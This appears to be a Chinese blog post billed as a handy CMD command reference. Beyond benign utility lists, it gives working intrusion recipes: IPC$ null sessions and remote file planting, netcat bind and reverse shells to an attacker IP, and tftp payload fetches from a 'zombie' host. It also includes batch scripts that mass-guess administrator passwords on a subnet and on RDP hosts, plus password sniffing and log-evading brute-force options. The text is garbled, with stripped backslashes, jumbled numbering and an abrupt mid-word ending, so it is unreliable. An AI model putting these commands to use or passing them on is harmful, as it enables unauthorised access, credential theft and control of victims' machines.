各位小夥伴們,大家好!
很多小夥伴在生活中會使用到cmd。
但是有些小夥伴在使用cmd的時候,很多命令都給忘記了。小編在網上找了一下,給大家看看吧。
執行操作CMD命令:開始->執行->鍵入cmd或command(在命令列裡可以看到系統版本、檔案系統版本)CMD命令錦集 1。 gpedit。msc——-組策略2。 sndrec32————-錄音機3。 Nslookup————-IP地址偵測器 ,是一個 監測網路中 DNS 伺服器是否能正確實現域名解析的命令列工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中卻沒有整合這一個工具。4。 explorer————-開啟資源管理器5。 logoff————-登出命令6。 shutdown————-60秒倒計時關機命令7。 lusrmgr。msc——本機使用者和組8。 services。msc——-本地服務設定9。 oobe/msoobe /a——檢查XP是否啟用10。 notepad————開啟記事本11。 cleanmgr————-垃圾整理12。 net start messenger——開始信使服務13。 compmgmt。msc——-計算機管理14。 net stop messenger——-停止信使服務15。 conf——————-啟動netmeeting16。 dvdplay————DVD播放器17。 charmap————啟動字元對映表18。 diskmgmt。msc——-磁碟管理實用程式19。 calc——————-啟動計算器20。 dfrg。msc————-磁碟碎片整理程式21。 chkdsk。exe——-Chkdsk磁碟檢查22。 devmgmt。msc——- 裝置管理器23。 regsvr32 /u *。dll——停止dll檔案執行24。 drwtsn32———— 系統醫生25。 rononce -p——15秒關機26。 dxdiag————-檢查DirectX資訊27。 regedt32————-登錄檔編輯器28。 Msconfig。exe——-系統配置實用程式29。 rsop。msc————-組策略結果集30。 mem。exe————顯示記憶體使用情況31。 regedit。exe——登錄檔32。 winchat————XP自帶區域網聊天33。 progman————程式管理器34。 winmsd————-系統資訊35。 perfmon。msc——計算機效能監測程式36。 winver————-檢查Windows版本37。 sfc /scannow——-掃描錯誤並復原38。 taskmgr——-任務管理器(2000/xp/200340。 wmimgmt。msc——開啟windows管理體系結構(WMI)41。 wupdmgr————windows更新程式42。 wscript————windows指令碼宿主設定43。 write——————寫字板45。 wiaacmgr————-掃描器和照相機嚮導46。 winchat————XP自帶區域網聊天49。 mplayer2————-簡易widnows media player50。 mspaint————畫圖板51。 mstsc——————遠端桌面連線53。 magnify————放大鏡實用程式54。 mmc——————開啟控制檯55。 mobsync————同步命令57。 iexpress————-木馬捆綁工具,系統自帶58。 fsmgmt。msc——-共享資料夾管理器59。 utilman————輔助工具管理器61。 dcomcnfg————-開啟系統元件服務62。 ddeshare————-開啟DDE共享設定110。 osk——————開啟螢幕鍵盤111。 odbcad32————-ODBC資料來源管理器112。 oobe/msoobe /a——檢查XP是否啟用68。 ntbackup————-系統備份和還原69。 narrator————-螢幕“講述人”70。 ntmsmgr。msc——移動儲存管理器71。 ntmsoprq。msc——-移動儲存管理員操作請求72。 netstat -an——(TC)命令檢查介面73。 syncapp————建立一個公文包74。 sysedit————系統配置編輯器75。 sigverif————-檔案簽名驗證程式76。 ciadv。msc————索引服務程式77。 shrpubw————建立共享資料夾78。 secpol。msc——-本地安全策略79。 syskey————-系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼80。 services。msc——-本地服務設定81。 Sndvol32————-音量控制程式82。 sfc。exe————系統檔案檢查器83。 sfc /scannow——-windows檔案保護84。 ciadv。msc————索引服務程式85。 tourstart————xp簡介(安裝完成後出現的漫遊xp程式)86。 taskmgr————任務管理器87。 eventvwr————-事件檢視器88。 eudcedit————-造字程式89。 compmgmt。msc——-計算機管理90。 packager————-物件包裝程式91。 perfmon。msc——計算機效能監測程式92。 charmap————啟動字元對映表93。 cliconfg————-SQL SERVER 客戶端網路實用程式94。 Clipbrd————剪貼簿檢視器95。 conf——————-啟動netmeeting96。 certmgr。msc——證書管理實用程式97。 regsvr32 /u *。dll——停止dll檔案執行98。 regsvr32 /u zipfldr。dll————取消ZIP支援99。 cmd。exe————CMD命令提示符操作詳解 net use ipipc$ “ ” /user:“ ” 建立IPC空連結net use ipipc$ “密碼” /user:“使用者名稱” 建立IPC非空連結net use h: ipc$ “密碼” /user:“使用者名稱” 直接登陸後對映對方C:到本地為H:net use h: ipc$ 登陸後對映對方C:到本地為H:net use ipipc$ /del 刪除IPC連結net use h: /del 刪除對映對方到本地的為H:的對映net user 使用者名稱密碼/add 建立使用者net user guest /active:yes 啟用guest使用者net user 檢視有哪些使用者net user 帳戶名 檢視帳戶的屬性net localgroup administrators 使用者名稱 /add 把“使用者”新增到管理員中使其具有管理員許可權net start 檢視開啟了哪些服務net start 服務名開啟服務;(如:net start telnet, net start schedule)net stop 服務名 停止某服務net time 目標ip 檢視對方時間net time 目標ip /set 設定本地計算機時間與“目標IP”主機的時間同步,加上引數/yes可取消確認資訊net view 檢視本地區域網內開啟了哪些共享net view ip 檢視對方區域網內開啟了哪些共享net config 顯示系統網路設定net logoff 斷開連線的共享net pause 服務名 暫停某服務net send ip “文字資訊” 向對方發信息net ver 區域網內正在使用的網路連線型別和資訊net share 檢視本地開啟的共享net share ipc$ 開啟ipc$共享net share ipc$ /del 刪除ipc$共享net share c$ /del 刪除C:共享net user guest 12345 用guest使用者登陸後用將密碼改為12345net password 密碼 更改系統登陸密碼netstat -a 檢視開啟了哪些埠,常用netstat -annetstat -n 檢視埠的網路連線情況,常用netstat -annetstat -v 檢視正在進行的工作netstat -p 協議名 例:netstat -p tcq/ip 檢視某協議使用情況netstat -s 檢視正在使用的所有協議使用情況nbtstat -A ip 對方136到139其中一個埠開了的話,就可檢視對方最近登陸的使用者名稱tracert -引數 ip(或計算機名) 跟蹤路由(資料包),引數:“-w數字”用於設定超時間隔。ping ip(或域名) 向對方主機發送預設大小為32位元組的資料,引數:“-l[空格]資料包大小”;“-n傳送資料次數”;“-t”指一直ping。ping -t -l 65550 ip 死亡之ping(傳送大於64K的檔案並一直ping就成了死亡之ping)ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)檢視本地ip地址,ipconfig可用引數“/all”顯示全部配置資訊tlist -t 以樹行列表顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)kill -F 程序名 加-F引數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)del -F 檔名 加-F引數後就可刪除只讀檔案,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔檔案,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的檔案。例如“DEL/AR *。*”表示刪除當前目錄下所有隻讀檔案,“DEL/A-S *。*”表示刪除當前目錄下除系統檔案以外的所有檔案del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和檔案。同時使用引數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)move 碟符路徑要移動的檔名存放移動檔案的路徑移動後文件名 移動檔案,用引數/y將取消確認移動目錄存在相同檔案的提示就直接覆蓋fc one。txt two。txt > 3st。txt 對比二個檔案並把不同之處輸出到3st。txt檔案中,“> ”和“> >” 是重定向命令at id號 開啟已註冊的某個計劃任務at /delete 停止所有計劃任務,用引數/yes則不需要確認就直接停止at id號 /delete 停止某個已註冊的計劃任務at 檢視所有的計劃任務at ip time 程式名(或一個命令) /r 在某時間執行對方某程式並重新啟動計算機finger username @host 檢視最近有哪些使用者登陸telnet ip 埠 遠和登陸伺服器,預設埠為23open ip 連線到IP(屬telnet登陸後的命令)telnet 在本機上直接鍵入telnet 將進入本機的telnetcopy 路徑檔名1路徑檔名2 /y 複製檔案1到指定的目錄為檔案2,用引數/y就同時取消確認你要改寫一份現存目錄檔案copy c:srv。exe ipadmin$ 複製本地c:srv。exe到對方的admin下copy 1st。jpg/b+2st。txt/a 3st。jpg 將2st。txt的內容藏身到1st。jpg中生成3st。jpg新的檔案,注:2st。txt檔案頭要空三排,引數:/b指二進位制檔案,/a指ASCLL格式檔案copy ipadmin$svv。exe c: 或:copyipadmin$*。* 複製對方admini$共享下的srv。exe檔案(所有檔案)至本地C:xcopy 要複製的檔案或目錄樹目標地址目錄名 複製檔案和目錄樹,用引數/Y將不提示覆蓋相同檔案用引數/e才可連目錄下的子目錄一起復制到目標地址下。tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server。exe c:server。exe 登陸後,將“IP”的server。exe下載到目標主機c:server。exe 引數:-i指以二進位制模式傳送,如傳送exe檔案時用,如不加-i 則以ASCII模式(傳送文字檔案模式)進行傳送tftp -i 對方IPput c:server。exe 登陸後,上傳本地c:server。exe至主機ftp ip 埠 用於上傳檔案至伺服器或進行檔案操作,預設埠為21。bin指用二進位制方式傳送(可執行檔案進);預設為ASCII格式傳送(文字檔案時)route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,閘道器地址Gateway addres,介面地址Interfacearp 檢視和處理ARP快取,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部資訊start 程式名或命令 /max 或/min 新開一個新視窗並最大化(最小化)執行某程式或命令mem 檢視cpu使用情況attrib 檔名(目錄名) 檢視某檔案(目錄)的屬性attrib 檔名 -A -R -S -H 或 +A +R +S +H 去掉(新增)某檔案的 存檔,只讀,系統,隱藏 屬性;用+則是新增為某屬性dir 檢視檔案,引數:/Q顯示檔案及目錄屬系統哪個使用者,/T:C顯示檔案建立時間,/T:A顯示檔案上次被訪問時間,/T:W上次被修改時間date /t 、 time /t 使用此引數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間set 指定環境變數名稱=要指派給變數的字元 設定環境變數set 顯示當前所有的環境變數set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數pause 暫停批處理程式,並顯示出:請按任意鍵繼續。。。。if 在批處理程式中執行條件處理(更多說明見if命令及變數)goto 標籤 將cmd。exe導向到批處理程式中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:“:start”標籤)call 路徑批處理檔名 從批處理程式中呼叫另一個批處理程式 (更多說明見call /?)for 對一組檔案中的每一個檔案執行某個特定命令(更多說明見for命令及變數)echo on或off 開啟或關閉echo,僅用echo不加引數則顯示當前echo設定echo 資訊 在螢幕上顯示出資訊echo 資訊 >> pass。txt 將“資訊”儲存到pass。txt檔案中findstr “Hello” aa。txt 在aa。txt檔案中尋找字串hellofind 檔名 查詢某檔案title 標題名字 更改CMD視窗標題名字color 顏色值 設定cmd控制檯前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt 名稱 更改cmd。exe的顯示的命令提示符(把C:、D:統一改為:EntSky )ver 在DOS視窗下顯示版本資訊winver 彈出一個視窗顯示版本資訊(記憶體大小、系統版本、補丁版本、計算機名)format 碟符 /FS:型別 格式化磁碟,型別:FAT、FAT32、NTFS ,例:Format D: /FS:NTFSmd目錄名 建立目錄replace 原始檔要替換檔案的目錄 替換檔案ren 原檔名新檔名 重新命名檔名tree 以樹形結構顯示出目錄,用引數-f 將列出第個資料夾中檔名稱type 檔名 顯示文字檔案的內容more 檔名 逐屏顯示輸出檔案doskey 要鎖定的命令=字元doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令列,重新呼叫win2k命令,並建立宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=taskmgr 調出任務管理器chkdsk /F D: 檢查磁碟D並顯示狀態報告;加引數/f並修復磁碟上的錯誤tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務預設埠23為其它任何埠exit 退出cmd。exe程式或目前,用引數/B則是退出當前批處理指令碼而不是cmd。exepath 路徑可執行檔案的檔名 為可執行檔案設定一個路徑。cmd 啟動一個win2K命令解釋視窗。引數:/eff、/en 關閉、開啟命令擴充套件;更我詳細說明見cmd /?regedit /s 登錄檔檔名 匯入登錄檔;引數/S指安靜模式匯入,無任何提示;regedit /e 登錄檔檔名 匯出登錄檔cacls 檔名引數 顯示或修改檔案訪問控制列表(ACL)——針對NTFS格式時。引數:/D 使用者名稱:設定拒絕某使用者訪問;/P 使用者名稱:perm 替換指定使用者的訪問許可權;/G 使用者名稱:perm 賦予指定使用者訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D: est。txt /D pub 設定d: est。txt拒絕pub使用者訪問。cacls 檔名 檢視檔案的訪問使用者許可權列表REM 文字內容 在批處理檔案中添加註解netsh 檢視或更改本地網路配置情況IIS服務命令iisreset /reboot 重啟win2k計算機(但有提示系統將重啟資訊出現)iisreset /start或stop 啟動(停止)所有Internet服務iisreset /restart 停止然後重新啟動所有Internet服務iisreset /status 顯示所有Internet服務狀態iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror引數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。FTP 命令: (後面有詳細說明內容)ftp的命令列格式為:ftp -v -d -i -n -g[主機名] -v 顯示遠端伺服器的所有響應資訊。-d 使用除錯方式。-n 限制ftp的自動登入,即不使用。netrc檔案。-g 取消全域性檔名。help [命令] 或 ?[命令] 檢視命令說明bye 或 quit 終止主機FTP程序,並退出FTP管理方式。pwd 列出當前遠端主機目錄put 或 send 本地檔名 [上傳到主機上的檔名] 將本地一個檔案傳送至遠端主機中get 或 recv [遠端主機檔名] [下載到本地後的檔名] 從遠端主機中傳送至本地主機中mget [remote-files] 從遠端主機接收一批檔案至本地主機mput local-files 將本地主機中一批檔案傳送至遠端主機dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的檔案。如果有本地檔案,就將結果寫至本地檔案ascii 設定以ASCII方式傳送檔案(預設值)bin 或 image 設定以二進位制方式傳送檔案bell 每完成一次檔案傳送,報警提示cdup 返回上一級目錄close 中斷與遠端伺服器的ftp會話(與open對應)open host[port] 建立指定ftp伺服器連線,可指定連線埠delete 刪除遠端主機中的檔案mdelete [remote-files] 刪除一批檔案mkdir directory-name 在遠端主機中建立目錄rename [from] [to] 改變遠端主機中的檔名rmdir directory-name 刪除遠端主機中的目錄status 顯示當前FTP的狀態system 顯示遠端主機系統型別user user-name [password] [account] 重新以別的使用者名稱登入遠端主機open host [port] 重新建立一個新的連線prompt 互動提示模式macdef 定義宏命令lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前使用者的HOME目錄chmod 改變遠端主機的檔案許可權case 當為ON時,用MGET命令複製的檔名到本地機器中,全部轉換為小寫字母cd remote-dir 進入遠端主機目錄cdup 進入遠端主機目錄的父目錄! 在本地機中執行互動shell,exit回到ftp環境,如!ls*。zip#5MYSQL 命令mysql -h主機地址 -u使用者名稱 -p密碼 連線MYSQL;如果剛安裝好MYSQL,超級使用者root是沒有密碼的。(例:mysql -h110。110。110。110 -Uroot -P123456注:u與root可以不用加空格,其它也一樣)exit 退出MYSQLmysqladmin -u使用者名稱 -p舊密碼 password 新密碼 修改密碼grant select on 資料庫。* to 使用者名稱@登入主機 identified by “密碼”; 增加新使用者。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都帶一個分號作為命令結束符)show databases; 顯示資料庫列表。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統資訊,我們改密碼和新增使用者,實際上就是用這個庫進行操作。use mysql;show tables; 顯示庫中的資料表describe 表名; 顯示資料表的結構create database 庫名; 建庫use 庫名;create table 表名 (欄位設定列表); 建表drop database 庫名;drop table 表名; 刪庫和刪表delete from 表名; 將表中記錄清空select * from 表名; 顯示錶中的記錄mysqldump ——opt school>school。bbb 備份資料庫:(命令在DOS的mysqlin目錄下執行);註釋:將資料庫school備份到school。bbb檔案,school。bbb是一個文字檔案,檔名任取,開啟看看你會有新發現。win2003系統下新增命令(實用部份):shutdown /引數 關閉或重啟本地或遠端主機。引數說明:/S 關閉主機,/R 重啟主機, /T 數字 設定延時的時間,範圍0~180秒之間, /A取消開機,/M //IP 指定的遠端主機。例:shutdown /r /t 0 立即重啟本地主機(無延時)taskill /引數 程序名或程序的pid 終止一個或多個任務和程序。引數說明:/PID 要終止程序的pid,可用tasklist命令獲得各程序的pid,/IM 要終止的程序的程序名,/F 強制終止程序,/T 終止指定的程序及他所啟動的子程序。tasklist 顯示當前執行在本地和遠端主機上的程序、服務、服務各程序的程序識別符號(PID)。引數說明:/M 列出當前程序載入的dll檔案,/SVC 顯示出每個程序對應的服務,無引數時就只列出當前的程序。Linux系統下基本命令注:要區分大小寫uname 顯示版本資訊(同win2K的 ver)dir 顯示當前目錄檔案,ls -al 顯示包括隱藏檔案(同win2K的 dir)pwd 查詢當前所在的目錄位置cd cd。。回到上一層目錄,注意cd 與。。之間有空格。cd/返回到根目錄。cat 檔名 檢視檔案內容cat >abc。txt 往abc。txt檔案中寫上內容。more 檔名 以一頁一頁的方式顯示一個文字檔案。cp 複製檔案mv 移動檔案rm 檔名 刪除檔案,rm -a 目錄名刪除目錄及子目錄mkdir 目錄名 建立目錄rmdir 刪除子目錄,目錄內沒有文件。chmod 設定檔案或目錄的存取許可權grep 在檔案中查詢字串diff 檔案檔案比較find 檔案搜尋date 現在的日期、時間who 查詢目前和你使用同一臺機器的人以及Login時間地點w 查詢目前上機者的詳細資料whoami 檢視自己的帳號名稱groups 檢視某人的Grouppasswd 更改密碼history 檢視自己下過的命令ps 顯示程序狀態kill 停止某程序gcc 駭客通常用它來編譯C語言寫的檔案su 許可權轉換為指定使用者telnet IP telnet連線對方主機(同win2K),當出現bash$時就說明連線成功。ftp ftp連線上某伺服器(同win2K)批處理命令與變數1:for命令及變數 基本格式FOR /引數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的引數,如:%i ,而指定一個變數則用:%%i ,而呼叫變數時用:%i% ,變數是區分大小寫的(%i 不等於 %I)。批處理每次能處理的變數從%0—%9共10個,其中%0預設給批處理檔名使用,%1預設為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3(set):指定一個或一組檔案,可使用萬用字元,如:(D:user。txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個“1”指起始值,第二個“1”指增長量,第三個“254”指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1 }command:指定對第個檔案執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開command_parameters:為特定命令指定引數或命令列開關IN (set):指在(set)中取值;DO command :指執行command引數:/L 指用增量形式{ (set)為增量形式時 };/F 指從檔案中不斷取值,直到取完為止{ (set)為檔案時,如(d:pass。txt)時 }。用法舉例:@echo offecho 用法格式:test。bat *。*。* > test。txtfor /L %%G in (1 1 254) do echo %1。%%G >>test。txt & net use \%1。%%G /user:administrator | find “命令成功完成” >>test。txt存為test。bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連線,如果成功就把該IP存在test。txt中。/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*。*。*為批處理預設的 %1;%%G 為變數(ip的最後一位);& 用來隔開echo 和net use 這二個命令;| 指建立了ipc$後,在結果中用find檢視是否有“命令成功完成”資訊;%1。%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。@echo offecho 用法格式:ok。bat ipFOR /F %%i IN (D:user。dic) DO smb。exe %1 %%i D:pass。dic 200存為:ok。exe 說明:輸入一個IP後,用字典檔案d:pass。dic來暴解d:user。dic中的使用者密碼,直到檔案中值取完為止。%%i為使用者名稱;%1為輸入的IP地址(預設)。七:2:if命令及變數 基本格式IF [not] errorlevel 數字 命令語句 如果程式執行最後返回一個等於或大於指定數字的退出編碼,指定條件為“真”。例:IF errorlevel 0 命令 指程式執行後返回的值為0時,就值行後面的命令;IF not errorlevel 1 命令指程式執行最後返回的值不等於1,就執行後面的命令。0 指發現併成功執行(真);1 指沒有發現、沒執行(假)。IF [not] 字串1==字串2 命令語句 如果指定的文字字串匹配(即:字串1 等於 字串2),就執行後面的命令。例:“if “%2%”==“4” goto start”指:如果輸入的第二個變數為4時,執行後面的命令(注意:呼叫變數時就%變數名%並加“ ”)IF [not] exist 檔名 命令語句 如果指定的檔名存在,就執行後面的命令。例:“if not nc。exe goto end”指:如果沒有發現nc。exe檔案就跳到“:end”標籤處。IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字串1==字串2 命令語句 else 命令語句或 IF [not] exist 檔名 命令語句 else 命令語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來,因為del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;例如:“if exist test。txt。 else echo test。txt。missing ”,注意命令中的“。”系統外部命令注:系統外部命令(均需下載相關工具)瑞士軍刀:nc。exe引數說明:-h 檢視幫助資訊-d 後臺模式-e prog程式重定向,一但連線就執行[危險]-i secs延時的間隔-l 監聽模式,用於入站連線-L 監聽模式,連線天閉後仍然繼續監聽,直到CTR+C-n IP地址,不能用域名-o film記錄16進位制的傳輸-p[空格]埠 本地埠號-r 隨機本地及遠端埠-t 使用Telnet互動方式-u UDP模式-v 詳細輸出,用-vv將更詳細-w數字 timeout延時間隔-z 將輸入,輸出關掉(用於掃錨時)基本用法:nc -nvv 192。168。0。1 80 連線到192。168。0。1主機的80埠nc -l -p 80 開啟本機的TCP 80埠並監聽nc -nvv -w2 -z 192。168。0。1 80-1024 掃錨192。168。0。1的80-1024埠nc -l -p 5354 -t -e c:winntsystem32cmd。exe 繫結remote主機的cmdshell在remote的TCP 5354埠nc -t -e c:winntsystem32cmd。exe 192。168。0。2 5354 梆定remote主機的cmdshell並反向連線192。168。0。2的5354埠高階用法:nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止nc -L -p 80 > c:log。txt 作為蜜罐用2:開啟並不停地監聽80埠,直到CTR+C,同時把結果輸出到c:log。txtnc -L -p 80 < c:honeyport。txt 作為蜜罐用3-1:開啟並不停地監聽80埠,直到CTR+C,並把c:honeyport。txt中內容送入管道中,亦可起到傳送檔案作用type。exe c:honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80埠,直到CTR+C,並把c:honeyport。txt中內容送入管道中,亦可起到傳送檔案作用本機上用:nc -l -p 本機埠在對方主機上用:nc -e cmd。exe 本機IP -p 本機埠 *win2Knc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連線突破對方主機的防火牆本機上用:nc -d -l -p 本機埠 < 要傳送的檔案路徑及名稱在對方主機上用:nc -vv 本機IP 本機埠 > 存放檔案的路徑及名稱 傳送檔案到對方主機備 注:| 管道命令< 或 > 重定向命令。“<”,例如:tlntadmn < test。txt 指把test。txt的內容賦值給tlntadmn命令@ 表示執行@後面的命令,但不會顯示出來(後臺執行);例:@dir c:winnt >> d:log。txt 意思是:後臺執行dir,並把結果存在d:log。txt中>與>>的區別 “>”指:覆蓋;“>>”指:儲存到(新增到)。如:@dir c:winnt >> d:log。txt和@dir c:winnt > d:log。txt二個命令分別執行二次比較看:用>>的則是把二次的結果都儲存了,而用:>則只有一次的結果,是因為第二次的結果把第一次的覆蓋了。八:掃描工具:xscan。exe基本格式xscan -host <起始IP>[-<終止IP>] <檢測專案> [其他選項] 掃錨“起始IP到終止IP”段的所有主機資訊xscan -file <主機列表檔名> <檢測專案> [其他選項] 掃錨“主機IP列表檔名”中的所有主機資訊檢測專案-active 檢測主機是否存活-os 檢測遠端作業系統型別(透過NETBIOS和SNMP協議)-port 檢測常用服務的埠狀態-ftp 檢測FTP弱口令-pub 檢測FTP服務匿名使用者寫許可權-pop3 檢測POP3-Server弱口令-smtp 檢測SMTP-Server漏洞-sql 檢測SQL-Server弱口令-smb 檢測NT-Server弱口令-iis 檢測IIS編碼/解碼漏洞-cgi 檢測CGI漏洞-nasl 載入Nessus攻擊指令碼-all 檢測以上所有專案其它選項-i 介面卡編號 設定網路介面卡, <介面卡編號>可透過“-l”引數獲取-l 顯示所有網路介面卡-v 顯示詳細掃描進度-p 跳過沒有響應的主機-o 跳過沒有檢測到開放埠的主機-t 併發執行緒數量,併發主機數量 指定最大併發執行緒數量和併發主機數量, 預設數量為100,10-log 檔名 指定掃描報告檔名 (字尾為:TXT或HTML格式的檔案)用法示例xscan -host 192。168。1。1-192。168。255。255 -all -active -p檢測192。168。1。1-192。168。255。255網段內主機的所有漏洞,跳過無響應的主機xscan -host 192。168。1。1-192。168。255。255 -port -smb -t 150 -o 檢測192。168。1。1-192。168。255。255網段內主機的標準埠狀態,NT弱口令使用者,最大併發執行緒數量為150,跳過沒有檢測到開放埠的主機xscan -file hostlist。txt -port -cgi -t 200,5 -v -o 檢測“hostlist。txt”檔案中列出的所有主機的標準埠狀態,CGI漏洞,最大併發執行緒數量為200,同一時刻最多檢測5臺主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機九:命令列方式嗅探器: xsniff。exe可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼引數說明-tcp 輸出TCP資料報-udp 輸出UDP資料報-icmp 輸出ICMP資料報-pass 過濾密碼資訊-hide 後臺執行-host 解析主機名-addr IP地址 過濾IP地址-port 埠 過濾埠-log 檔名 將輸出儲存到檔案-asc 以ASCII形式輸出-hex 以16進位制形式輸出用法示例xsniff。exe -pass -hide -log pass。log 後臺執行嗅探密碼並將密碼資訊儲存在pass。log檔案中xsniff。exe -tcp -udp -asc -addr 192。168。1。1 嗅探192。168。1。1並過濾tcp和udp資訊並以ASCII格式輸出終端服務密碼破解: tscrack。exe引數說明-h 顯示使用幫助-v 顯示版本資訊-s 在螢幕上打出解密能力-b 密碼錯誤時發出的聲音-t 同是發出多個連線(多執行緒)-N Prevent System Log entries on targeted server-U 解除安裝移除tscrack元件-f 使用-f後面的密碼-F 間隔時間(頻率)-l 使用-l後面的使用者名稱-w 使用-w後面的密碼字典-p 使用-p後面的密碼-D 登入主頁面用法示例tscrack 192。168。0。1 -l administrator -w pass。dic 遠端用密碼字典檔案暴破主機的administrator的登陸密碼tscrack 192。168。0。1 -l administrator -p 123456 用密碼123456遠端登陸192。168。0。1的administrator使用者@if not exist ipcscan。txt goto noscan@for /f “tokens=1 delims= ” %%i in (3389。txt) do call hack。bat %%inscan@echo 3389。txt no find or scan faild(①存為3389。bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表檔案3389。txt)3389。bat意思是:從3389。txt檔案中取一個IP,接著執行hack。bat@if not exist tscrack。exe goto noscan@tscrack %1 -l administrator -w pass。dic >>rouji。txt:noscan@echo tscrack。exe no find or scan faild(②存為hack。bat) (執行3389。bat就OK,且3389。bat、hack。bat、3389。txt、pass。dic與tscrack。exe在同一個目錄下;就可以等待結果了)hack。bat意思是:執行tscrack。exe用字典暴破3389。txt中所有主機的administrator密碼,並將破解結果儲存在rouji。txt檔案中。其它Shutdown。exeShutdown IP地址 t:20 20秒後將對方NT自動關閉(Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。)fpipe。exe (TCP埠重定向工具) 在第二篇中有詳細說明(埠重定向繞過防火牆)fpipe -l 80 -s 1029 -r 80 當有人掃錨你的80埠時,他掃到的結果會完全是的主機資訊Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP傳送的23埠Telnet請求經埠重定向後,就透過88埠傳送到目標IP的23埠。(與目標IP建立Telnet時本機就用的88埠與其相連線)然後:直接Telnet 127。0。0。1(本機IP)就連線到目標IP的23埠了。OpenTelnet。exe (遠端開啟telnet工具)opentelnet。exe IP 帳號密碼ntlm認證方式Telnet埠 (不需要上傳ntlm。exe破壞微軟的身份驗證方式)直接遠端開啟對方的telnet服務後,就可用telnet ip 連線上對方。NTLM認證方式:0:不使用NTLM身份驗證;1:先嚐試NTLM身份驗證,如果失敗,再使用使用者名稱和密碼;2:只使用NTLM身份驗證。ResumeTelnet。exe (OpenTelnet附帶的另一個工具)resumetelnet。exe IP帳號密碼 用Telnet連線完對方後,就用這個命令將對方的Telnet設定還原,並同時關閉Telnet服務。FTP命令詳解FTP命令是Internet使用者使用最頻繁的命令之一,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效。如果你想學習使用進行後臺FTP下載,那麼就必須學習FTP指令。FTP的命令列格式為:ftp -v -d -i -n -g [主機名] ,其中-v 顯示遠端伺服器的所有響應資訊-n 限制ftp的自動登入,即不使用;。n etrc檔案;-d 使用除錯方式;-g 取消全域性檔名。FTP使用的內部命令如下(中括號表示可選項):1。![cmd[args]]:在本地機中執行互動shell,exit回到ftp環境,如:!ls*。zip2。$ macro-ame[args]: 執行宏定義macro-name。3。account[password]: 提供登入遠端系統成功後訪問系統資源所需的補充口令。4。append local-file[remote-file]:將本地檔案追加到遠端系統主機,若未指定遠端系統檔名,則使用本地檔名。5。ascii:使用ascii型別傳輸方式。6。bell:每個命令執行完畢後計算機響鈴一次。7。bin:使用二進位制檔案傳輸方式。8。bye:退出ftp會話過程。9。case:在使用mget時,將遠端主機檔名中的大寫轉為小寫字母。10。 cd remote-dir:進入遠端主機目錄。11。cdup:進入遠端主機目錄的父目錄。12。chmod mode file-name:將遠端主機檔案file-name的存取方式設定為mode,如:chmod 777 a。out。13。close:中斷與遠端伺服器的ftp會話(與open對應)。14 。cr:使用asscii方式傳輸檔案時,將回車換行轉換為回行。15。delete remote-file:刪除遠端主機檔案。16。debug[debug-value]:設定除錯方式, 顯示傳送至遠端主機的每條命令,如:deb up 3,若設為0,表示取消debug。17。dir[remote-dir][local-file]:顯示遠端主機目錄,並將結果存入本地檔案。18。disconnection:同close。19。form 